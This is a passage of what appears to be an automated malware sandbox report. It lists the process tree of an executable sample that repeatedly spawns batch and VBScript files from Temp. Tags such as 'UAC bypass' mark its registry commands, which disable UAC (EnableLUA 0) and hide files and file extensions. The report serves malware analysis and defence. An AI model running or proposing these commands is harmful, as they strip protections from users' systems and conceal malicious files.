        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        22⤵
        
        PID:1728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        22⤵
        Modifies registry key
        
        PID:1396
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        20⤵
        
        PID:1716
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        20⤵
        Modifies registry key
        
        PID:816
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\HYIsQkcs.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        20⤵
        
        PID:1128
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        21⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        20⤵
        
        PID:2716
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        18⤵
        
        PID:2036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        18⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        18⤵
        
        PID:2236
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\VeQoUssY.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        19⤵
        
        PID:1180
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        19⤵
        
        PID:2760
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        20⤵
        
        PID:2848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        19⤵
        Modifies registry key
        
        PID:2848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        19⤵
        Modifies registry key
        
        PID:1400
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        19⤵
        
        PID:2852
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\NEwUwEgE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        18⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        19⤵
        
        PID:880
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        16⤵
        Modifies registry key
        
        PID:568
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\MUEMcoUQ.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        16⤵
        
        PID:2908
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        17⤵
        
        PID:2000
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        16⤵
        
        PID:1784
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        16⤵
        Modifies registry key
        
        PID:280
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        14⤵
        
        PID:1248
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        15⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoUIAQkg.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        16⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        16⤵
        
        PID:2092
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        17⤵
        
        PID:1400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        16⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        16⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        Modifies registry key
        
        PID:2868
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        16⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        14⤵
        
        PID:920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        14⤵
        
        PID:2068
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\awAAYYMI.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        14⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        15⤵
        
        PID:2636
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        16⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        12⤵
        
        PID:2456
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        12⤵
        
        PID:1728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        12⤵
        
        PID:2096
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\aUYMIUUE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        12⤵
        
        PID:2268
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        13⤵
        
        PID:460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        10⤵
        
        PID:1128
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        10⤵
        
        PID:1676
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        10⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\BqMwgcUE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        10⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        11⤵
        
        PID:1524
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        11⤵
        
        PID:2340
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        12⤵
        
        PID:3024
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        13⤵
        
        PID:1964
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cogAAMUA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        13⤵
        
        PID:2092
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        11⤵
        
        PID:2868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        8⤵
        
        PID:2072
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        9⤵
        
        PID:2716
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\CMsIYEkA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        9⤵
        
        PID:1568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        9⤵
        
        PID:736
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        9⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        9⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        8⤵
        
        PID:2852
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        8⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\sEYgQIsY.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        8⤵
        
        PID:2604
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        9⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:1204
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\mokIcwIk.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        6⤵
        
        PID:2988
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        7⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:2540
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        6⤵
        Modifies registry key
        
        PID:2064
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        6⤵
        
        PID:2908
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        6⤵
        Modifies registry key
        
        PID:1064
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\DkQgIIkc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
      4⤵
      PID:1484
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:1576
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      PID:1896
    - - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        5⤵
        
        PID:1312
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        6⤵
        
        PID:2768
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:1828
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies visibility of file extensions in Explorer
      PID:1820
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\DccQoEEY.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
    3⤵
    PID:2084
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\NiQwMEAk.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:1784
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:2376
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:328
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1092
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:2436

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "485291185910689714-129737092714957715277799388734880079021399706613-815934960"
1⤵
PID:2488

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "4024378392645968002947841592102836081-697536973592760651646000979-1282842018"
1⤵
PID:2368
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:1504

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1126642001-333405829-1827904859-1826659146145143167-6654378251816977031-1370338918"
1⤵
PID:2208

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
- UAC bypass
PID:1580

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:2956

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:1996

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12308905171234337884890729913117627285315945868002016075018-1513890987914643314"
1⤵
PID:1624

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1284533713-886480572-1353214519300767611823065651-123218404-1050891017110903471"
1⤵
- Modifies visibility of file extensions in Explorer
PID:1540

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-891841645-1531673043-147813745144343730911819564011044772269-11051155581231763803"
1⤵
PID:1372

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16436515902325668957184929461828042834-1612510446-1816611755620784821-29725017"
1⤵
PID:2468

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2013461911776721874-1267722131-1865301214-1205528878494890139322458709983717050"
1⤵
PID:2904

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1374770174-1025101660-116941407767875732-48484895112586458557652907692060375805"
1⤵
PID:1488

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2160

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1053090539-1242059463151551773-9081262421282083510046169482086100885856008101"
1⤵
PID:1064

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "919092079-644288633225556198824929422280579003370750605696997651-799020259"
1⤵
PID:1484

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "67826484410401031591721872037846272522-13758290724819845064378735-187866496"
1⤵
PID:1676

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1732
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:2508

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2244

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
1⤵
PID:1112
- C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
  C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
  2⤵
  PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FKYEoAoY.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
    3⤵
    PID:2872
  - - C:\Windows\SysWOW64\cscript.exe
      cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
      4⤵
      PID:2252

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\CIYoYYsw.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
1⤵
PID:2804
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:2064
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\HQsMwwYg.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    PID:364
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:2904
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
    3⤵
    PID:2764

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-164944474-1283334039752445188-12098030821036716201916773020-14284887471401869795"
1⤵
PID:2776

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:988
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:2068

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2260

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\JUwMkAcA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:2984
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - Modifies visibility of file extensions in Explorer
  - UAC bypass
  PID:2088
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1400
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies registry key
  PID:880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:2056

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1696

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:1832
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\CQsEgsQU.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:868
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:2124
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:568
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:2232

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1592

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "22138133612828732-532639450-2133586032-2029361535-1630105130-1037729024-1069434282"
1⤵
PID:2604

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:2220

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "401923799-751566642-12254421351452715708-3859326341035480828-51567348-163254468"
1⤵
PID:1380

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "564340052-441570153-2372419311132312068-109903134311926627126532027171340788536"
1⤵
PID:1308

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\duIAUccc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
1⤵
PID:296
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:2564
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\TYAAsEYA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:2944
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:2988

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\zuUkUAwE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:1732
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:2928
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:2800
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:1964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:108

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:2264

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\LisccYcQ.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
1⤵
PID:1728
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:1444

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
- UAC bypass
- Checks whether UAC is enabled
- System policy modification
PID:1696

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2756

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
1⤵
PID:1548
- C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
  C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
  2⤵
  PID:1692

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2092
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:1300
